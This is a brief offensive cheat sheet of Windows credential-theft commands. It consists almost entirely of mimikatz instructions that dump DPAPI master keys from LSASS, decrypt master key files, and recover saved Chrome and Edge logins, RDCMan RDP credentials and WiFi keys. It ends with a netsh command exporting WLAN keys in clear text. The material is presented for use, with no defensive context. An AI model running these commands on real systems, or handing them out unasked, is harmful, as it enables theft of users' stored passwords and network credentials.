DPAPI & Protected Data
DPAPI Master Keys
# Dump cached DPAPI master keys from LSASS memory (mimikatz sekurlsa module)
sekurlsa::dpapi
# Decrypt a master key file with the owning user's SID and password
dpapi::masterkey /in:masterkey_file /sid:S-1-5-21-XXX /password:Password123
# Decrypt saved Chrome logins from the Login Data file with a decrypted master key
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /masterkey:MASTERKEY
# Edge passwords
dpapi::edge /in:"%localappdata%\Microsoft\Edge\User Data\Default\Login Data"
RDP Credentials
# Decrypt credentials saved by Remote Desktop Connection Manager (RDCMan.settings)
dpapi::rdg /in:"%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"
WiFi Passwords
# Dump WiFi passwords
dpapi::wifi
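# Export all WLAN profiles with built-in netsh; each profile is written to C:\temp as an XML file with its key in clear text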
netsh wlan export profile key=clear folder=C:\temp